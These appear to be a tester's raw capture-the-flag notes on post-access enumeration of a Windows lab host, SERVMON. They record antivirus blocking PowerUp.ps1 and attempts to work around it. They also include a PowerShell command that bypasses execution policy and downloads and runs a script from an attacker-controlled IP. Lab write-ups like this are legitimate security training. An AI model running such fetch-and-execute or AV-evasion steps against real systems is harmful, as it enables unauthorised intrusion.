4 box enum nadine
# some AV is blocking file writes and file downloads
# remotely running PowerUp.ps1 via IEX is failing.
| This script contains malicious content and has been blocked by your antivirus software.
nadine@SERVMON C:\inetpub>dir
Directory of C:\inetpub
08/04/2020 23:21 <DIR> .
08/04/2020 23:21 <DIR> ..
08/04/2020 23:09 <DIR> ftproot
14/01/2020 20:01 <DIR> logs
# nothing in ftproot
# looking for the same files as in ftp
nadine@SERVMON C:\>dir /b /s "Confidential.txt"
C:\Shared\Users\Nadine\Confidential.txt
# we can write files here.
# certutil.exe is failing; PS wget works
# PowerUp is failing due to AV checks
# win.exe is failing to execute.
# need to enumerate manually
# net user <>
| both nadine and nathan are just *USERS
| Administrator is in 'administrators' localgroup
# running Get-RemoteProgram.ps1
nadine@SERVMON C:\Shared\Users\Nadine>powershell -exec bypass IEX(New-Object Net.WebClient).downloadString('http://10.10.16.7/Get-RemoteProgram.ps1')
ComputerName ProgramName
------------ -----------
SERVMON      VMware Tools
SERVMON      NSClient++ (x64)
SERVMON      Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
SERVMON      Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.27.29016
SERVMON      Microsoft Visual C++ 2019 X64 Additional Runtime - 14.27.29016
SERVMON      NVMS-1000
SERVMON      Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319
SERVMON      Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.27.29016
SERVMON      Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.27.29016
SERVMON      Microsoft Visual C++ 2019 X86 Additional Runtime - 14.27.29016
SERVMON      Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
SERVMON      NVMS-1000
SERVMON      Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.27.29016
SERVMON      Microsoft OneDrive